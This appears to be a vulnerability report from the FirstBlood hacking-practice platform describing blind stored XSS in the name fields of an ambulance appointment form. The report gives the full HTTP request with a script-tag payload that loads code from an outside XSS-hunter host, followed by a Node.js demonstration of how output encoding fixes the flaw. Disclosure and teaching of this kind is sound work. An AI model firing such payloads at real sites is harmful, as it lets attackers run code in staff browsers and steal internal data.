FirstBlood-#1729: Blind XSS in appointments
This issue was discovered on FirstBlood v3



On 2022-12-14, pichik (Level 4) reported:

Hello doctor Sean,

DESCRIPTION:

I found that the appointment params are vulnerable to blind XSS, and the payload is executed internally.
The vulnerable params are fname and lname.
There is no filtering or encoding, so the payload is as simple as "><script+src=https://xsshunter.ht></script>.
It will trigger if the address in the appointment was not found and an attempt to call failed, but I cannot tell if these are the only requirements.

Here is the request:

POST /api/ba.php HTTP/1.1
Host: 9f0fae8ab2d6-pichik.a.firstbloodhackers.com
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 27138-7496-80253

&address=test&city=test&phonenumber=test&email=test&dob=test&a1=&a2=&a3=&message=&slot=&drId=1&ambulance=1&status=&fname="><script+src=https://xsshunter.ht></script>&lname="><script+src=https://xsshunter.ht></script>

POC SCREEN:

Here is a screenshot from the internal endpoint:

IMPACT:

An attacker can access internal information with this XSS.

REMEDIATION:

HTML encode all user input to prevent XSS.

P1 CRITICAL

Endpoint: /api/ba.php

Parameter: lname, fname

Payload: "><script+src=https://xsshunter.ht></script>


FirstBlood ID: 78
Vulnerability Type: Stored XSS

When booking an appointment with the ambulance value set to "1", the user's full name is vulnerable to stored XSS on the internal admin panel "firstblood-helper.com".
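The following is an added example, not code from the report or from FirstBlood, showing why the reported payload fires and what the suggested remediation (HTML-encoding at output time) changes. The field names come from the report's request; the helper-panel template shown here is assumed, since the page only shows that the full name is rendered on the internal panel. The sample appointment record is constructed. Runs under Node.js with no dependencies.

```javascript
// Added example, not FirstBlood's code. Demonstrates the reported
// fname/lname payload against an assumed helper-panel template, first
// rendered unsafely and then with HTML entity encoding.

// The raw value from the report's form body. /api/ba.php reads it as
// application/x-www-form-urlencoded, so '+' becomes a space.
const RAW_FNAME = '"><script+src=https://xsshunter.ht></script>';

// Decode a form-urlencoded value the way the backend would see it.
function formDecode(v) {
  return decodeURIComponent(v.replace(/\+/g, ' '));
}

// What ends up stored for the name fields.
const PAYLOAD = formDecode(RAW_FNAME);

// Constructed sample record for an ambulance booking (ambulance=1 is the
// condition FirstBlood lists for the internal panel rendering the name).
const appointment = {
  fname: PAYLOAD,
  lname: PAYLOAD,
  phonenumber: 'test',
  address: 'test',
  ambulance: '1',
};

// Vulnerable rendering (assumed template shape): the stored value is
// concatenated straight into markup inside a double-quoted attribute. The
// leading '">' closes the attribute and the element, leaving a live
// <script src=https://xsshunter.ht> in the helper's page.
function renderNameUnsafe(appt) {
  return `<input type="text" name="fullname" value="${appt.fname} ${appt.lname}">`;
}

// Minimal HTML entity encoder covering the characters that matter in both
// element text and double-quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: same template, but every untrusted value is encoded
// for the HTML attribute context at the point it is written out.
function renderNameSafe(appt) {
  return `<input type="text" name="fullname" value="${escapeHtml(appt.fname)} ${escapeHtml(appt.lname)}">`;
}

// Cheap regression check for a test suite: does rendered markup contain a
// script tag that did not come from the template itself?
function containsLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

console.log('unsafe:', renderNameUnsafe(appointment));
console.log('safe:  ', renderNameSafe(appointment));
console.log('unsafe has live script:', containsLiveScript(renderNameUnsafe(appointment)));
console.log('safe has live script:  ', containsLiveScript(renderNameSafe(appointment)));
```

Encoding at output, as in renderNameSafe, is the fix the report asks for; stripping or rejecting characters at input time is not equivalent, because the same stored name is rendered in more than one place and the internal panel was the one that was missed.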